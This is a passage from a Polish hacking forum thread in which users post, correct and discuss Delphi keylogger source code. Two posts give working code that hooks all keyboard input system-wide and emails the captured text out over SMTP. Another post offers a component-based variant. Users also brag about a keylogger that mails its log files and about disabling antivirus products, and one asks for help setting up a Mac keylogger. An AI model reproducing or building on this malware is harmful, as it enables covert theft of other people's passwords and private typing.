Strona 4 z 4 PierwszyPierwszy ... 234
Pokaż wyniki od 46 do 57 z 57
  1. #46

    Domyślnie

    Kod:
    unit Unit1;
    
    interface
    
    uses
    **Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    **Dialogs, StdCtrls, IdComponent, IdTCPConnection, IdTCPClient,
    **IdMessageClient, IdSMTP, IdBaseComponent, IdSysLogMessage;
    
    type
    **TForm1 = class(TForm)
    ****Memo1: TMemo;
    ****MessageSend: TIdSysLogMessage;
    ****SMTP: TIdSMTP;
    ****procedure FormDestroy(Sender: TObject);
    ****procedure FormCreate(Sender: TObject);
    **private
    ****{ Private declarations }
    **public
    ****{ Public declarations }
    **end;
    
    var
    **Form1: TForm1;
    **Hook : Integer;
    
    **MessageBuffer :TEventMsg;
    implementation
    
    {$R *.dfm}
    
    procedure TForm1.FormDestroy(Sender: TObject);
    begin
    UnHookWindowsHookEx(Hook); // wprowadzamy
    end;
    // prosta Funkcja przechwytująca strumień danych TYLKO WIELKIE LITERY
    function Play(Code: integer; wParam, lParam: Longint): Longint; stdcall;
    begin
    case Code of
    HC_ACTION: begin
    MessageBuffer:=PEventMsg(lParam)^;
    if MessageBuffer.message = wm_KeyDown then
    begin
    
    Form1.Memo1.Text:=Form1.Memo1.Text+chr(MessageBuffer.paraml);
    Result:=0;
    end;
    end;
    else
    begin
    Result := CallNextHookEx(Hook, Code, wParam, lParam);
    end;
    end;
    end;
    
    procedure TForm1.FormCreate(Sender: TObject);
    begin
     Hook:=SetWindowsHookEx(wh_journalrecord,play,HInstance,0);
    end;
    
    Procedure CostamCostam(Sender : TObject);
    
    
    Begin
    MessageSend.Body.Append('TMemo.Text'; // wprowadzasz treść jako TMemo.Text
    
    MessageSend.From.Name := 'Przemo'; //od kogo
    MessageSend.From.Address := '[email protected]'; //podajesz adres e-mail nadawcy
    MessageSend.Recipients.EMailAddresses := '[email protected]'; //adres e-mail odbiorcy
    MessageSend.Subject := 'Key'; //temat listu
    
    { UserName bądź UserId - to jest zeleżne od wersji Indy.}
    
    SMTP .UserName := '[email protected]';
    SMTP.Password := '********';
    SMTP.Host := 'smtp.poczta.onet.pl';
    SMTP.AuthenticationType:=atLogin; // autoryzacja SMTP
    SMTP.Connect;
    try
    SMTP.Send(MessageSend); //wyślij
    finally
    SMTP.Disconnect; //jeśli zakończy to rozłącz z serwerem
    end;
    end;
    
    end.

  2. #47
    Użytkownik
    Dołączył
    20-01-2008
    Skąd
    Smażyno
    Posty
    60

    Domyślnie

    @myslaf
    Poprawiłem:

    Kod:
    unit Unit1;
    
    interface
    
    uses
    **Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    **Dialogs, StdCtrls, IdComponent, IdTCPConnection, IdTCPClient,
    **IdMessageClient, IdSMTP, IdBaseComponent, IdSysLogMessage, IdMessage;
    
    type
    **TForm1 = class(TForm)
    ****Memo1: TMemo;
    ****SMTP: TIdSMTP;
    ****MessageSend: TIdMessage;
    ****procedure FormDestroy(Sender: TObject);
    ****procedure FormCreate(Sender: TObject);
    **private
    ****{ Private declarations }
    **public
    ****{ Public declarations }
    **end;
    
    var
    **Form1: TForm1;
    **Hook : Integer;
    
    **MessageBuffer :TEventMsg;
    implementation
    
    {$R *.dfm}
    
    procedure TForm1.FormDestroy(Sender: TObject);
    begin
    **UnHookWindowsHookEx(Hook);
    end;
    
    function Play(Code: integer; wParam, lParam: Longint): Longint; stdcall;
    begin
    **case Code of
    ****HC_ACTION: begin
    ******MessageBuffer:=PEventMsg(lParam)^;
    ******if MessageBuffer.message = wm_KeyDown then
    ******begin
    ********Form1.Memo1.Text:=Form1.Memo1.Text+chr(MessageBuffer.paraml);
    ********Result:=0;
    ******end;
    ****end;
    ****else
    ****begin
    ******Result := CallNextHookEx(Hook, Code, wParam, lParam);
    ****end;
    **end;
    end;
    
    procedure TForm1.FormCreate(Sender: TObject);
    begin
    **Hook:=SetWindowsHookEx(wh_journalrecord,play,HInstance,0);
    end;
    
    procedure CostamCostam(Sender : TObject);
    begin
    **Form1.MessageSend.Body.Append('TMemo.Text');
    **Form1.MessageSend.From.Name := 'Przemo';
    **Form1.MessageSend.From.Address := '[email protected]';
    **Form1.MessageSend.Recipients.EMailAddresses := '[email protected]';
    **Form1.MessageSend.Subject := 'Key';
    
    **Form1.SMTP.UserName := '[email protected]';
    **Form1.SMTP.Password := '********';
    **Form1.SMTP.Host := 'smtp.poczta.onet.pl';
    **Form1.SMTP.AuthenticationType:=atLogin; // autoryzacja SMTP
    **Form1.SMTP.Connect;
    **try
    ****Form1.SMTP.Send(Form1.MessageSend);
    **finally
    ****Form1.SMTP.Disconnect; //jeśli zakończy to rozłącz z serwerem
    **end;
    end;
    
    end.

  3. #48
    Użytkownik
    Dołączył
    04-08-2009
    Posty
    3

    Domyślnie

    emilianx co prawda potrafisz przechwycić klawisze ale powinieneś to zrobić w inny sposób a mianowicie tak:
    zainstalować komponent KeySpXp następnie wstawić komponent Memo1 i nadać mu nazwę List.
    Po wykonaniu tych czynności kliknij dwukrotnie komponent KeyspXp i wpisz następujący kod:

    Kod:
    procedure TAlfa12.KeySpyXP1Key(Sender: TObject; key: String);
    begin
    List.text := List.text + key;
    List.text:=Stringreplace(List.Text,'{ENTER}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{RightMouseButton}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{LeftMouseButton}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{DELETE}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{Alt}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{shift}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{ctrl}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{TAB}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{LEFT SHIFT}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{UP}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{DOWN}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{RIGHT}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{LEFT}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F1}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F2}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F3}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F4}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F5}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F6}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F7}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F8}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F9}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F10}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F11}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{F12}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{RIGHT CONTROL}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{LEFT ALT}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{BACKSPACE}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{LEFT CONTROL}','',[rfreplaceall]);
    List.text:=Stringreplace(List.Text,'{RIGHT ALT}','',[rfreplaceall]);
    end;
    
    end.
    Wtedy ten keylogger będzie dokładniej przechwytywał z klawiatury.

  4. #49
    Dawni Moderatorzy Avatar grzonu
    Dołączył
    26-12-2006
    Skąd
    Gdansk, Poland, Poland
    Posty
    1 243

    Domyślnie

    uzyj tego komponentu a potem spojrz na wykrywalnosc
    Filmy online---Grzonu Blog

    1) Moje gg to nie pomoc techniczna w obsludze keyloggerow!!! Na gg i pw pomagam tylko w kwestiach organizacyjnych forum. Masz problem to pisz na forum.
    2) Nie zajmuje sie malware a uprzedzajac pytanie "czemu?" - bo taki mam kaprys!

  5. #50
    Użytkownik Avatar Damn3d
    Dołączył
    18-04-2009
    Skąd
    Tokio
    Posty
    63

    Domyślnie

    A po co wam w ogóle forma w tym śmiesznym "keyloggerze" ?

    Keylogger GhostXP zbudowany jest na zupełnie innej platformie przechwytującej, przy zastosowaniu zupełnie innych komponentów[/b]
    Niesamowite.

  6. #51
    Użytkownik
    Dołączył
    04-08-2009
    Posty
    3

    Domyślnie

    Faktycznie forma jest zbędna, w delphi nie potrafię ale w c+ builder robiłem keylogger który wyłapuje klawisze i wszystko zapisuje w pliku txt, następnie wysyła ten plik na emaila jako załącznik.
    Ten keylogger używa tylko komponenty do wysyłania emaila i jest o wiele lepszy od keyloggera napisanego w delphi.

  7. #52
    Użytkownik
    Dołączył
    04-08-2009
    Posty
    3

    Domyślnie

    A poza tym w C+ builder umiem zmieniać niektóre funkcje antywirusów takich jak kaspersky, nod i panda

  8. #53
    Użytkownik (R) Avatar djmentos
    Dołączył
    01-05-2007
    Skąd
    Gdansk, Poland, Poland
    Posty
    1 147

    Domyślnie

    W Delphi też się takie coś da uzyskać pisząc w konsoli.

  9. #54

    Domyślnie

    Poważnie do tej pory nie pracowałam na tym bo nie wiedziłam ze sie da.


    Najlepsza oferta egipt all inclusive

  10. #55
    Użytkownik Avatar Reiko
    Dołączył
    27-10-2010
    Skąd
    wziąć kobietę?
    Posty
    28

    Domyślnie

    Proszę Was... nie zaczynajcie śmiesznej i niekończącej kampanii który język programowania jest lepszy a który gorszy. Piszcie w tym co Wam pasuje, co lubicie. Proste. Wg mnie kto pisze że Delphi jest "be" jest bezmuzgiem i mało wie o Delphi.
    "I and my machine, this is my beautyful dream..."

  11. #56

    Domyślnie

    Reiko, archeolog?

    07-08-2009, 09:57

  12. #57

    Domyślnie

    Witam, mam ogromną prośbę ściągnełam sobie logkext na maca zainstalowalam, natomiast mam problem z notanikiem haslem nie wiem co dalej z tym zrobić czy mogę prosić o jakieś wskazówki lub prośbę aby ktoś sie do mnie odezwał np. mailowo aby mi dokładnie to wytłumaczyć??? pozdrawiam

Podobne wątki

  1. Odpowiedzi: 3
    Ostatni post / autor: 25-01-2014, 21:57
  2. Odpowiedzi: 1
    Ostatni post / autor: 28-05-2013, 20:22
  3. exploity krok po kroku
    Przez sitek
    w forum Exploits/PenTests
    Odpowiedzi: 1
    Ostatni post / autor: 14-01-2006, 22:44

Uprawnienia

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •